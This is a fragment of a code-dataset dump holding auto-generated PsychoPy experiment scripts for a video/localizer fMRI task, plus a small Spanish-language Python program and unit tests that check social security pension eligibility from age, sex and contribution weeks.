thisComponent.status != FINISHED:\n continueRoutine = True\n break # at least one component has not yet finished\n \n # check for quit (the [Esc] key)\n if event.getKeys([\"escape\"]):\n core.quit()\n \n # refresh the screen\n if continueRoutine: # don't flip if this routine is over or we'll get a blank screen\n win.flip()\n else: # this Routine was not non-slip safe so reset non-slip timer\n routineTimer.reset()\n\n#-------Ending Routine \"instr6\"-------\nfor thisComponent in instr6Components:\n if hasattr(thisComponent, \"setAutoDraw\"):\n thisComponent.setAutoDraw(False)\n\n# set up handler to look after randomisation of conditions etc\ntrials = data.TrialHandler(nReps=1, method='sequential', \n extraInfo=expInfo, originPath=None,\n trialList=data.importConditions('conditions.xlsx'),\n seed=None, name='trials')\nthisExp.addLoop(trials) # add the loop to the experiment\nthisTrial = trials.trialList[0] # so we can initialise stimuli with some values\n# abbreviate parameter names if possible (e.g. rgb=thisTrial.rgb)\nif thisTrial != None:\n for paramName in thisTrial.keys():\n exec(paramName + '= thisTrial.' + paramName)\n\nfor thisTrial in trials:\n currentLoop = trials\n # abbreviate parameter names if possible (e.g. rgb = thisTrial.rgb)\n if thisTrial != None:\n for paramName in thisTrial.keys():\n exec(paramName + '= thisTrial.' + paramName)\n \n #------Prepare to start Routine \"vid\"-------\n t = 0\n vidClock.reset() # clock \n frameN = -1\n # update component parameters for each repeat\n movie = visual.MovieStim(win=win, name='movie',\n filename=stim,\n ori=0, pos=[0, 0], opacity=1,\n depth=0.0,\n )\n# key_resp_temp = event.BuilderKeyResponse() # create an object of type KeyResponse\n# key_resp_temp.status = NOT_STARTED\n # keep track of which components have finished\n vidComponents = []\n vidComponents.append(movie)\n# vidComponents.append(key_resp_temp)\n for thisComponent in vidComponents:\n if hasattr(thisComponent, 'status'):\n thisComponent.status = NOT_STARTED\n \n #-------Start Routine \"vid\"-------\n continueRoutine = True\n while continueRoutine:\n # get current time\n t = vidClock.getTime()\n frameN = frameN + 1 # number of completed frames (so 0 is the first frame)\n # update/draw components on each frame\n \n # *movie* updates\n if t >= 0.0 and movie.status == NOT_STARTED:\n # keep track of start time/frame for later\n movie.tStart = t # underestimates by a little under one frame\n movie.frameNStart = frameN # exact frame index\n movie.setAutoDraw(True)\n if movie.status == FINISHED: # force-end the routine\n continueRoutine = False\n \n# # *key_resp_temp* updates\n# if t >= 0.0 and key_resp_temp.status == NOT_STARTED:\n# # keep track of start time/frame for later\n# key_resp_temp.tStart = t # underestimates by a little under one frame\n# key_resp_temp.frameNStart = frameN # exact frame index\n# key_resp_temp.status = STARTED\n# # keyboard checking is just starting\n# key_resp_temp.clock.reset() # now t=0\n# event.clearEvents()\n# if key_resp_temp.status == STARTED:\n# theseKeys = event.getKeys(keyList=['return'])\n# if len(theseKeys) > 0: # at least one key was pressed\n# key_resp_temp.keys = theseKeys[-1] # just the last key pressed\n# key_resp_temp.rt = key_resp_temp.clock.getTime()\n# # a response ends the routine\n# continueRoutine = False\n \n # check if all components have finished\n if not continueRoutine: # a component has requested a forced-end of Routine\n routineTimer.reset() # if we abort early the non-slip timer needs reset\n break\n continueRoutine = False # will revert to True if at least one component still running\n for thisComponent in vidComponents:\n if hasattr(thisComponent, \"status\") and thisComponent.status != FINISHED:\n continueRoutine = True\n break # at least one component has not yet finished\n \n # check for quit (the [Esc] key)\n if event.getKeys([\"escape\"]):\n core.quit()\n \n # refresh the screen\n if continueRoutine: # don't flip if this routine is over or we'll get a blank screen\n win.flip()\n else: # this Routine was not non-slip safe so reset non-slip timer\n routineTimer.reset()\n \n #-------Ending Routine \"vid\"-------\n for thisComponent in vidComponents:\n if hasattr(thisComponent, \"setAutoDraw\"):\n thisComponent.setAutoDraw(False)\n# # check responses\n# if key_resp_temp.keys in ['', [], None]: # No response was made\n# key_resp_temp.keys=None\n# # store data for trials (TrialHandler)\n# trials.addData('key_resp_temp.keys',key_resp_temp.keys)\n# if key_resp_temp.keys != None: # we had a response\n# trials.addData('key_resp_temp.rt', key_resp_temp.rt)\n \n #------Prepare to start Routine \"quest\"-------\n t = 0\n questClock.reset() # clock \n frameN = -1\n # update component parameters for each repeat\n image.setImage(question)\n response = event.BuilderKeyResponse() # create an object of type KeyResponse\n response.status = NOT_STARTED\n # keep track of which components have finished\n questComponents = []\n questComponents.append(image)\n questComponents.append(response)\n for thisComponent in questComponents:\n if hasattr(thisComponent, 'status'):\n thisComponent.status = NOT_STARTED\n \n #-------Start Routine \"quest\"-------\n continueRoutine = True\n while continueRoutine:\n # get current time\n t = questClock.getTime()\n frameN = frameN + 1 # number of completed frames (so 0 is the first frame)\n # update/draw components on each frame\n \n # *image* updates\n if t >= 0.0 and image.status == NOT_STARTED:\n # keep track of start time/frame for later\n image.tStart = t # underestimates by a little under one frame\n image.frameNStart = frameN # exact frame index\n image.setAutoDraw(True)\n \n # *response* updates\n if t >= 0.0 and response.status == NOT_STARTED:\n # keep track of start time/frame for later\n response.tStart = t # underestimates by a little under one frame\n response.frameNStart = frameN # exact frame index\n response.status = STARTED\n # keyboard checking is just starting\n response.clock.reset() # now t=0\n event.clearEvents()\n if response.status == STARTED:\n theseKeys = event.getKeys(keyList=['a', 'b', 'c', 'd'])\n if len(theseKeys) > 0: # at least one key was pressed\n response.keys = theseKeys[-1] # just the last key pressed\n response.rt = response.clock.getTime()\n # a response ends the routine\n continueRoutine = False\n \n # check if all components have finished\n if not continueRoutine: # a component has requested a forced-end of Routine\n routineTimer.reset() # if we abort early the non-slip timer needs reset\n break\n continueRoutine = False # will revert to True if at least one component still running\n for thisComponent in questComponents:\n if hasattr(thisComponent, \"status\") and thisComponent.status != FINISHED:\n continueRoutine = True\n break # at least one component has not yet finished\n \n # check for quit (the [Esc] key)\n if event.getKeys([\"escape\"]):\n core.quit()\n \n # refresh the screen\n if continueRoutine: # don't flip if this routine is over or we'll get a blank screen\n win.flip()\n else: # this Routine was not non-slip safe so reset non-slip timer\n routineTimer.reset()\n \n #-------Ending Routine \"quest\"-------\n for thisComponent in questComponents:\n if hasattr(thisComponent, \"setAutoDraw\"):\n thisComponent.setAutoDraw(False)\n # check responses\n if response.keys in ['', [], None]: # No response was made\n response.keys=None\n # store data for trials (TrialHandler)\n trials.addData('response.keys',response.keys)\n if response.keys != None: # we had a response\n trials.addData('response.rt', response.rt)\n thisExp.nextEntry()\n \n# completed 1 repeats of 'trials'\n\n\n#------Prepare to start Routine \"end\"-------\nt = 0\nendClock.reset() # clock \nframeN = -1\n# update component parameters for each repeat\nkey_resp_end = event.BuilderKeyResponse() # create an object of type KeyResponse\nkey_resp_end.status = NOT_STARTED\n# keep track of which components have finished\nendComponents = []\nendComponents.append(thanks)\nendComponents.append(key_resp_end)\nfor thisComponent in endComponents:\n if hasattr(thisComponent, 'status'):\n thisComponent.status = NOT_STARTED\n\n#-------Start Routine \"end\"-------\ncontinueRoutine = True\nwhile continueRoutine:\n # get current time\n t = endClock.getTime()\n frameN = frameN + 1 # number of completed frames (so 0 is the first frame)\n # update/draw components on each frame\n \n # *thanks* updates\n if t >= 0.0 and thanks.status == NOT_STARTED:\n # keep track of start time/frame for later\n thanks.tStart = t # underestimates by a little under one frame\n thanks.frameNStart = frameN # exact frame index\n thanks.setAutoDraw(True)\n \n # *key_resp_end* updates\n if t >= 0.0 and key_resp_end.status == NOT_STARTED:\n # keep track of start time/frame for later\n key_resp_end.tStart = t # underestimates by a little under one frame\n key_resp_end.frameNStart = frameN # exact frame index\n key_resp_end.status = STARTED\n # keyboard checking is just starting\n key_resp_end.clock.reset() # now t=0\n event.clearEvents()\n if key_resp_end.status == STARTED:\n theseKeys = event.getKeys(keyList=['return'])\n if len(theseKeys) > 0: # at least one key was pressed\n key_resp_end.keys = theseKeys[-1] # just the last key pressed\n key_resp_end.rt = key_resp_end.clock.getTime()\n # a response ends the routine\n continueRoutine = False\n \n # check if all components have finished\n if not continueRoutine: # a component has requested a forced-end of Routine\n routineTimer.reset() # if we abort early the non-slip timer needs reset\n break\n continueRoutine = False # will revert to True if at least one component still running\n for thisComponent in endComponents:\n if hasattr(thisComponent, \"status\") and thisComponent.status != FINISHED:\n continueRoutine = True\n break # at least one component has not yet finished\n \n # check for quit (the [Esc] key)\n if event.getKeys([\"escape\"]):\n core.quit()\n \n # refresh the screen\n if continueRoutine: # don't flip if this routine is over or we'll get a blank screen\n win.flip()\n else: # this Routine was not non-slip safe so reset non-slip timer\n routineTimer.reset()\n\n#-------Ending Routine \"end\"-------\nfor thisComponent in endComponents:\n if hasattr(thisComponent, \"setAutoDraw\"):\n thisComponent.setAutoDraw(False)\nwin.close()\ncore.quit()\n"
},
{
"alpha_fraction": 0.639541506767273,
"alphanum_fraction": 0.6549199819564819,
"avg_line_length": 41.77184295654297,
"blob_id": "76aac50f1e894bedf4226cc9d9435f302a46c709",
"content_id": "849b4ee69080d9cad3bc1589340a4c99fdae9a22",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 17622,
"license_type": "no_license",
"max_line_length": 149,
"num_lines": 412,
"path": "/dyloc_orig.py",
"repo_name": "maheen/gablab-psychopy-tasks",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nThis experiment was created using PsychoPy2 Experiment Builder (v1.74.00), Thu Aug 22 17:37:08 2013\nIf you publish work using this script please cite the relevant PsychoPy publications\n Peirce, JW (2007) PsychoPy - Psychophysics software in Python. Journal of Neuroscience Methods, 162(1-2), 8-13.\n Peirce, JW (2009) Generating stimuli for neuroscience using PsychoPy. Frontiers in Neuroinformatics, 2:10. doi: 10.3389/neuro.11.010.2008\n\"\"\"\n\nfrom __future__ import division #so that 1/3=0.333 instead of 1/3=0\nfrom psychopy import visual, core, data, event, logging, gui\nfrom psychopy.constants import * #things like STARTED, FINISHED\nimport numpy as np # whole numpy lib is available, prepend 'np.'\nfrom numpy import sin, cos, tan, log, log10, pi, average, sqrt, std, deg2rad, rad2deg, linspace, asarray\nfrom numpy.random import random, randint, normal, shuffle, seed\nimport os #handy system and path functions\n\n#store info about the experiment session\nexpName='None'#from the Builder filename that created this script\nexpInfo={'participant':'', 'run':'1'}\ndlg=gui.DlgFromDict(dictionary=expInfo,title=expName)\nif dlg.OK==False: core.quit() #user pressed cancel\nexpInfo['date']=data.getDateStr()#add a simple timestamp\nexpInfo['expName']=expName\n#setup files for saving\nif not os.path.isdir('data'):\n os.makedirs('data') #if this fails (e.g. permissions) we will get error\nfilename='data' + os.path.sep + '%s_%s' %(expInfo['participant'], expInfo['date'])\nlogFile=logging.LogFile(filename+'.log', level=logging.EXP)\nlogging.console.setLevel(logging.WARNING)#this outputs to the screen, not a file\n\n#an ExperimentHandler isn't essential but helps with data saving\nthisExp = data.ExperimentHandler(name=expName, version='',\n extraInfo=expInfo, runtimeInfo=None,\n originPath=None,\n savePickle=False, saveWideText=False,\n dataFileName=filename)\ndatFile=open('data' + os.path.sep + '%s_dyn_run%s.txt' %(expInfo['participant'], expInfo['run']),'a')\ndatFile.write('Trial\\tStim\\tType\\tOnset\\n')\n\n#setup the Window\nwin = visual.Window(size=(1920, 1080), fullscr=True, screen=0, allowGUI=False, allowStencil=False,\n monitor=u'testMonitor', color=u'black', colorSpace=u'rgb')\n\n#Initialise components for Routine \"waiting\"\nwaitingClock=core.Clock()\ncircles=visual.MovieStim(win=win, name='circles',units=u'norm', \n filename=u'stimuli/oblique1.mov',\n ori=0, pos=[0, 0], opacity=1, loop=True,\n size=2,\n depth=0.0,\n )\n\n#Initialise components for Routine \"fix\"\nfixClock=core.Clock()\nfullscreen=visual.GratingStim(win=win, name='fullscreen',units=u'norm', \n tex=None, mask=None,\n ori=0, pos=[0, 0], size=2, sf=None, phase=0.0,\n color=1.0, colorSpace=u'rgb', opacity=1,\n texRes=128, interpolate=True, depth=0.0)\n\n#Initialise components for Routine \"trial\"\ntrialClock=core.Clock()\n\n# Create some handy timers\nglobalClock=core.Clock() #to track the time since experiment started\nroutineTimer=core.CountdownTimer() #to track time remaining of each (non-slip) routine \nbegExpClock=core.Clock() #to track the time since the waiting routine ended (ie when the sync pulse was given)\n\n#------Prepare to start Routine\"waiting\"-------\nt=0; waitingClock.reset() #clock \nframeN=-1\n#update component parameters for each repeat\nscan_start = event.BuilderKeyResponse() #create an object of type KeyResponse\nscan_start.status=NOT_STARTED\n#keep track of which components have finished\nwaitingComponents=[]\nwaitingComponents.append(circles)\nwaitingComponents.append(scan_start)\nfor thisComponent in waitingComponents:\n if hasattr(thisComponent,'status'): thisComponent.status = NOT_STARTED\n#-------Start Routine \"waiting\"-------\ncontinueRoutine=True\nwhile continueRoutine:\n #get current time\n t=waitingClock.getTime()\n frameN=frameN+1#number of completed frames (so 0 in first frame)\n #update/draw components on each frame\n \n #*circles* updates\n if t>=0.0 and circles.status==NOT_STARTED:\n #keep track of start time/frame for later\n circles.tStart=t#underestimates by a little under one frame\n circles.frameNStart=frameN#exact frame index\n circles.setAutoDraw(True)\n \n #*scan_start* updates\n if t>=0.0 and scan_start.status==NOT_STARTED:\n #keep track of start time/frame for later\n scan_start.tStart=t#underestimates by a little under one frame\n scan_start.frameNStart=frameN#exact frame index\n scan_start.status=STARTED\n #keyboard checking is just starting\n scan_start.clock.reset() # now t=0\n event.clearEvents()\n if scan_start.status==STARTED:#only update if being drawn\n theseKeys = event.getKeys(keyList=['return', '+', 'num_add'])\n if len(theseKeys)>0:#at least one key was pressed\n scan_start.keys=theseKeys[-1]#just the last key pressed\n scan_start.rt = scan_start.clock.getTime()\n #abort routine on response\n continueRoutine=False\n \n #check if all components have finished\n if not continueRoutine: #a component has requested that we end\n routineTimer.reset() #this is the new t0 for non-slip Routines\n break\n continueRoutine=False#will revert to True if at least one component still running\n for thisComponent in waitingComponents:\n if hasattr(thisComponent,\"status\") and thisComponent.status!=FINISHED:\n continueRoutine=True; break#at least one component has not yet finished\n \n #check for quit (the [Esc] key)\n if event.getKeys([\"escape\"]):\n core.quit()\n \n #refresh the screen\n if continueRoutine:#don't flip if this routine is over or we'll get a blank screen\n win.flip()\n\n#End of Routine \"waiting\"\nfor thisComponent in waitingComponents:\n if hasattr(thisComponent,\"setAutoDraw\"): thisComponent.setAutoDraw(False)\nbegExpClock.reset()\n\nrep=0\nwhile rep<2:\n #set up handler to look after randomisation of conditions etc\n allColors=np.array(['darkgreen','red','blue','yellow','orange','lime','brown','cyan','purple','violet'])\n myarray = []\n for i in range(6):\n myarray.append({'color': allColors[i]}) #puts data into an array of dictionaries that the TrialHandler function will accept\n fixes=data.TrialHandler(nReps=1, method=u'random', \n extraInfo=expInfo, originPath=None,\n trialList=myarray,\n seed=None, name='fixes')\n thisExp.addLoop(fixes)#add the loop to the experiment\n thisFixe=fixes.trialList[0]#so we can initialise stimuli with some values\n #abbreviate parameter names if possible (e.g. rgb=thisFixe.rgb)\n if thisFixe!=None:\n for paramName in thisFixe.keys():\n exec(paramName+'=thisFixe.'+paramName)\n \n for thisFixe in fixes:\n currentLoop = fixes\n #abbrieviate parameter names if possible (e.g. rgb=thisFixe.rgb)\n if thisFixe!=None:\n for paramName in thisFixe.keys():\n exec(paramName+'=thisFixe.'+paramName)\n \n #------Prepare to start Routine\"fix\"-------\n t=0; fixClock.reset() #clock \n frameN=-1\n routineTimer.add(3.000000)\n #update component parameters for each repeat\n fullscreen.setColor(color, colorSpace=u'rgb')\n #keep track of which components have finished\n fixComponents=[]\n fixComponents.append(fullscreen)\n for thisComponent in fixComponents:\n if hasattr(thisComponent,'status'): thisComponent.status = NOT_STARTED\n #-------Start Routine \"fix\"-------\n continueRoutine=True\n while continueRoutine and routineTimer.getTime()>0:\n #get current time\n t=fixClock.getTime()\n frameN=frameN+1#number of completed frames (so 0 in first frame)\n #update/draw components on each frame\n \n #*fullscreen* updates\n if t>=0.0 and fullscreen.status==NOT_STARTED:\n #keep track of start time/frame for later\n fullscreen.tStart=t#underestimates by a little under one frame\n fullscreen.frameNStart=frameN#exact frame index\n fullscreen.setAutoDraw(True)\n elif fullscreen.status==STARTED and t>=(0.0+3.0):\n fullscreen.setAutoDraw(False)\n \n #check if all components have finished\n if not continueRoutine: #a component has requested that we end\n routineTimer.reset() #this is the new t0 for non-slip Routines\n break\n continueRoutine=False#will revert to True if at least one component still running\n for thisComponent in fixComponents:\n if hasattr(thisComponent,\"status\") and thisComponent.status!=FINISHED:\n continueRoutine=True; break#at least one component has not yet finished\n \n #check for quit (the [Esc] key)\n if event.getKeys([\"escape\"]):\n core.quit()\n \n #refresh the screen\n if continueRoutine:#don't flip if this routine is over or we'll get a blank screen\n win.flip()\n \n #End of Routine \"fix\"\n for thisComponent in fixComponents:\n if hasattr(thisComponent,\"setAutoDraw\"): thisComponent.setAutoDraw(False)\n thisExp.nextEntry()\n \n #completed 1 repeats of 'fixes'\n \n \n #set up handler to look after randomisation of conditions etc\n allstims=np.genfromtxt('conditions.txt',dtype=str,delimiter='\\t',skip_header=1)\n allBodies=allstims[:,0]\n allFaces=allstims[:,1]\n allObjects=allstims[:,2]\n allScenes=allstims[:,3]\n allScrambled=allstims[:,4]\n seed(int(expInfo['participant'])+int(expInfo['run'])+65)\n shuffle(allBodies)\n shuffle(allFaces)\n shuffle(allObjects)\n shuffle(allScenes)\n shuffle(allScrambled)\n if rep==0:\n ran=range(6)\n blockNum=range(5)\n elif rep==1:\n ran=range(6,12)\n blockNum=range(5,10)\n designs = [[1,2,3,4,5,5,4,3,2,1],[2,4,1,3,5,5,3,1,4,2],[3,2,5,1,4,4,1,5,2,3],[4,1,5,2,3,3,2,5,1,4],[5,3,1,4,2,2,4,1,3,5],[5,4,3,2,1,1,2,3,4,5]]\n blockList=np.array(designs[int(expInfo['run'])-1])\n stimList=[]\n typeList=[]\n for block in blockList[blockNum]:\n if block ==1:\n stimList.extend(allFaces[ran])\n typeList.extend(['face']*len(ran))\n elif block==2:\n stimList.extend(allBodies[ran])\n typeList.extend(['body']*len(ran))\n elif block==3:\n stimList.extend(allScenes[ran])\n typeList.extend(['scene']*len(ran))\n elif block==4:\n stimList.extend(allObjects[ran])\n typeList.extend(['object']*len(ran))\n elif block==5:\n stimList.extend(allScrambled[ran])\n typeList.extend(['scrambled']*len(ran))\n myarray = []\n for i in range(len(stimList)):\n myarray.append({'stim': stimList[i],'type': typeList[i]}) #puts data into an array of dictionaries that the TrialHandler function will accept\n trials=data.TrialHandler(nReps=1, method=u'sequential', \n extraInfo=expInfo, originPath=None,\n trialList=myarray,\n seed=None, name='trials')\n thisExp.addLoop(trials)#add the loop to the experiment\n thisTrial=trials.trialList[0]#so we can initialise stimuli with some values\n #abbreviate parameter names if possible (e.g. rgb=thisTrial.rgb)\n if thisTrial!=None:\n for paramName in thisTrial.keys():\n exec(paramName+'=thisTrial.'+paramName)\n \n for thisTrial in trials:\n currentLoop = trials\n #abbrieviate parameter names if possible (e.g. rgb=thisTrial.rgb)\n if thisTrial!=None:\n for paramName in thisTrial.keys():\n exec(paramName+'=thisTrial.'+paramName)\n \n #------Prepare to start Routine\"trial\"-------\n t=0; trialClock.reset() #clock \n frameN=-1\n routineTimer.add(3.000000)\n #update component parameters for each repeat\n movie=visual.MovieStim(win=win, name='movie',\n filename=stim,\n ori=0, pos=[0, 0], opacity=1,\n depth=0.0,\n )\n #keep track of which components have finished\n trialComponents=[]\n trialComponents.append(movie)\n for thisComponent in trialComponents:\n if hasattr(thisComponent,'status'): thisComponent.status = NOT_STARTED\n #-------Start Routine \"trial\"-------\n continueRoutine=True\n while continueRoutine and routineTimer.getTime()>0:\n #get current time\n t=trialClock.getTime()\n frameN=frameN+1#number of completed frames (so 0 in first frame)\n #update/draw components on each frame\n \n #*movie* updates\n if t>=0.0 and movie.status==NOT_STARTED:\n #keep track of start time/frame for later\n movie.tStart=t#underestimates by a little under one frame\n movie.frameNStart=frameN#exact frame index\n movie.setAutoDraw(True)\n stimOn=begExpClock.getTime()\n elif movie.status==STARTED and t>=(0.0+3.0):\n movie.setAutoDraw(False)\n \n #check if all components have finished\n if not continueRoutine: #a component has requested that we end\n routineTimer.reset() #this is the new t0 for non-slip Routines\n break\n continueRoutine=False#will revert to True if at least one component still running\n for thisComponent in trialComponents:\n if hasattr(thisComponent,\"status\") and thisComponent.status!=FINISHED:\n continueRoutine=True; break#at least one component has not yet finished\n \n #check for quit (the [Esc] key)\n if event.getKeys([\"escape\"]):\n core.quit()\n \n #refresh the screen\n if continueRoutine:#don't flip if this routine is over or we'll get a blank screen\n win.flip()\n \n #End of Routine \"trial\"\n for thisComponent in trialComponents:\n if hasattr(thisComponent,\"setAutoDraw\"): thisComponent.setAutoDraw(False)\n thisExp.nextEntry()\n \n #Add data to output file\n datFile.write('%s\\t%s\\t%s\\t%s\\n'%(trials.thisTrialN+1,stim,type,stimOn))\n rep=rep+1\nthisExp.nextEntry()\n\n#set up handler to look after randomisation of conditions etc\nallColors=np.array(['darkgreen','red','blue','yellow','orange','lime','brown','cyan','purple','violet'])\nmyarray = []\nfor i in range(6):\n myarray.append({'color': allColors[i]}) #puts data into an array of dictionaries that the TrialHandler function will accept\nfixes=data.TrialHandler(nReps=1, method=u'random', \n extraInfo=expInfo, originPath=None,\n trialList=myarray,\n seed=None, name='fixes')\nthisExp.addLoop(fixes)#add the loop to the experiment\nthisFixe=fixes.trialList[0]#so we can initialise stimuli with some values\n#abbreviate parameter names if possible (e.g. rgb=thisFixe.rgb)\nif thisFixe!=None:\n for paramName in thisFixe.keys():\n exec(paramName+'=thisFixe.'+paramName)\n\nfor thisFixe in fixes:\n currentLoop = fixes\n #abbrieviate parameter names if possible (e.g. rgb=thisFixe.rgb)\n if thisFixe!=None:\n for paramName in thisFixe.keys():\n exec(paramName+'=thisFixe.'+paramName)\n \n #------Prepare to start Routine\"fix\"-------\n t=0; fixClock.reset() #clock \n frameN=-1\n routineTimer.add(1.000000)\n #update component parameters for each repeat\n fullscreen.setColor(color, colorSpace=u'rgb')\n #keep track of which components have finished\n fixComponents=[]\n fixComponents.append(fullscreen)\n for thisComponent in fixComponents:\n if hasattr(thisComponent,'status'): thisComponent.status = NOT_STARTED\n #-------Start Routine \"fix\"-------\n continueRoutine=True\n while continueRoutine and routineTimer.getTime()>0:\n #get current time\n t=fixClock.getTime()\n frameN=frameN+1#number of completed frames (so 0 in first frame)\n #update/draw components on each frame\n \n #*fullscreen* updates\n if t>=0.0 and fullscreen.status==NOT_STARTED:\n #keep track of start time/frame for later\n fullscreen.tStart=t#underestimates by a little under one frame\n fullscreen.frameNStart=frameN#exact frame index\n fullscreen.setAutoDraw(True)\n elif fullscreen.status==STARTED and t>=(0.0+1.0):\n fullscreen.setAutoDraw(False)\n \n #check if all components have finished\n if not continueRoutine: #a component has requested that we end\n routineTimer.reset() #this is the new t0 for non-slip Routines\n break\n continueRoutine=False#will revert to True if at least one component still running\n for thisComponent in fixComponents:\n if hasattr(thisComponent,\"status\") and thisComponent.status!=FINISHED:\n continueRoutine=True; break#at least one component has not yet finished\n \n #check for quit (the [Esc] key)\n if event.getKeys([\"escape\"]):\n core.quit()\n \n #refresh the screen\n if continueRoutine:#don't flip if this routine is over or we'll get a blank screen\n win.flip()\n \n #End of Routine \"fix\"\n for thisComponent in fixComponents:\n if hasattr(thisComponent,\"setAutoDraw\"): thisComponent.setAutoDraw(False)\n thisExp.nextEntry()\n\n#completed 1 repeats of 'fixes'\n\n\n#Shutting down:\nwin.close()\ncore.quit()\n"
}
] | 11 |
mgmdi/IngenieriaDeSoftware | https://github.com/mgmdi/IngenieriaDeSoftware | 7669fec92e598e9a6a6db46e48a921d7b35d789e | 7224cfae8980d4567edfd984f4d437fe8fd9a374 | 16acddc7bffb37da1c35d38ecc0d22a5fa4c0f0b | refs/heads/master | 2020-03-31T19:39:52.523143 | 2018-10-11T16:44:53 | 2018-10-11T16:44:53 | 152,505,899 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6000000238418579,
"alphanum_fraction": 0.6496000289916992,
"avg_line_length": 25.04166603088379,
"blob_id": "d1bcc1c0a6e43f69433a135190047b90c63374c9",
"content_id": "c91b446b2f6eb31ef4fa0cb8d43b47a7154a2060",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 625,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 24,
"path": "/test_beta.py",
"repo_name": "mgmdi/IngenieriaDeSoftware",
"src_encoding": "UTF-8",
"text": "import unittest\nimport seguros\n\nclass TestBeta(unittest.TestCase):\n\n def test_calculoEdad(self):\n \n self.assertEqual(seguros.calculoEdad(\"16/12/1998\"), 19)\n with self.assertRaises(SystemExit) as cm:\n seguros.calculoEdad(\"16061997\")\n\n self.assertEqual(cm.exception.code, 1)\n\n def test_verificacionDatos(self):\n\n self.assertEqual(seguros.verificacionDatos(50,\"f\",800,15), \"SI\")\n with self.assertRaises(SystemExit) as cm:\n seguros.verificacionDatos(56,\"l\",\"m\",15)\n\n self.assertEqual(cm.exception.code, 1)\n\n\nif __name__ == '__main__':\n unittest.main() "
},
{
"alpha_fraction": 0.579974353313446,
"alphanum_fraction": 0.5920410752296448,
"avg_line_length": 33.469024658203125,
"blob_id": "386ce4f6feb0c749f8b8928100351b11ac14f99d",
"content_id": "4b51bbc5469dd16ae6dd0f238a1e6a896e6986a8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3895,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 113,
"path": "/seguros.py",
"repo_name": "mgmdi/IngenieriaDeSoftware",
"src_encoding": "UTF-8",
"text": "''' \nCreated on 9 oct. 2018\n\n@author: Mariagabriela Jaimes\n Maria Grimaldi \n'''\n\nimport datetime\nimport sys \n\ndef verificacionDatos(age,sex,weeksC,indicador):\n \"\"\"\n Descripcion: funcion que dada la edad, el sexo y las semanas cotizadas de \n un solicitante se verifica si cumple con los requisitos necesarios para\n el seguro social de IVSS\n Parametros: int age, string sex, int weeksC, int indicador \n (tiempo disminuido por trabajar en medios insalubres)\n Valor de retorno: \"Si\" si cumple con los requerimientos\n \"No\" en caso contrario\n \"\"\"\n\n if (not(str(age).isdigit()) or sex.lower() not in [\"m\",\"f\",\"femenino\",\"masculino\"] or \n not(str(weeksC).isdigit())):\n print(\"Error, existe alguna discrepancia entre la edad, el sexo o las semanas\")\n exit(1) \n\n if(sex.lower() == \"m\" and int(age) >= 60 - indicador and int(weeksC)>=750):\n return(\"SI\")\n elif(sex.lower() == \"f\" and int(age) >= 55 - indicador and int(weeksC)>=750):\n return(\"SI\")\n else:\n return(\"NO\")\n \n\ndef calculoEdad(fecha):\n \"\"\"\n Descripcion: funcion que dada una fecha de nacimiento procesa el string y\n arroja la edad actual\n Parametros: string fecha en el formato XX/XX/XXXX\n Valor de retorno: int edad actual\n \"\"\"\n \n fecha = fecha.split('/')\n if (len(fecha) != 3 or not(fecha[0].isdigit()) or not(fecha[1].isdigit()) or not(fecha[2].isdigit())):\n print(\"Existe alguna discrepancia en la fecha\")\n exit(1)\n\n now = datetime.datetime.now()\n\n if(int(fecha[1])<= now.month):\n edad = int(now.year) - int(fecha[2])\n else:\n edad = int(now.year) - int(fecha[2]) - 1\n \n\n return edad\n\ndef main():\n \"\"\"\n Descripcion: funcion que funciona como menu en la aplicacion. Toma los datos\n ya sea de consola o de un archivo de texto y llama a las funciones respectivas\n para su procesamiento\n Parametros: None\n Valor de retorno: None\n \"\"\"\n opcion = input(\"Ingrese la opcion 1 para ingresar datos por consola, ingrese dos para cargar un archivo de texto: \")\n if(opcion == \"1\"):\n edad = calculoEdad(input(\"Imgrese fecha de nacimiento (XX/XX/XXXX): \"))\n sexo = input(\"Ingrese su sexo: \")\n semCoti = input(\"Ingrese el numero de semanas cotizadas: \")\n descontEdad = input(\"Ha trabajado usted en medios insalubres o capaces de producir vejez prematura? \")\n if descontEdad.lower() not in [\"si\",\"no\"]:\n print(\"Error, la respuesta debe ser si o no\")\n exit(1)\n if(descontEdad.lower() == \"si\"):\n numAnos = input(\"Indique el numero de anos que trabajo: \")\n\n anosDestontados = int(numAnos) // 4\n if (anosDestontados > 5):\n anosDestontados = 5\n verificacion = verificacionDatos(edad,sexo,semCoti,anosDestontados)\n print(verificacion)\n return verificacion\n\n else:\n verificacion = verificacionDatos(edad,sexo,semCoti,0)\n print(verificacion)\n return verificacion\n elif(opcion == \"2\"):\n nombre = input(\"Ingrese nombre del archivo: \")\n file = open(nombre, \"r\")\n for line in file:\n datos = line.split()\n edad = calculoEdad(datos[0])\n if(len(datos) == 5 and datos[3].lower() == \"si\"):\n anosDestontados = int(datos[4]) // 4\n if (anosDestontados > 5):\n anosDestontados = 5\n verificacion = verificacionDatos(edad,datos[1],datos[2], anosDestontados)\n print(verificacion)\n return verificacion\n\n else:\n verificacion = verificacionDatos(edad,datos[1],datos[2], 0)\n print(verificacion)\n return verificacion\n else:\n print(\"Error, debe ingresar 1 o 2\")\n \n\n\nif __name__ == '__main__':\n main() "
},
{
"alpha_fraction": 0.5932501554489136,
"alphanum_fraction": 0.6364914774894714,
"avg_line_length": 38.776222229003906,
"blob_id": "2c1f28875013e4768dd3d40424ea316448c88f94",
"content_id": "0f208048cc7022cd8d3e82a5b46b98126f96c89b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5689,
"license_type": "no_license",
"max_line_length": 134,
"num_lines": 143,
"path": "/test.py",
"repo_name": "mgmdi/IngenieriaDeSoftware",
"src_encoding": "UTF-8",
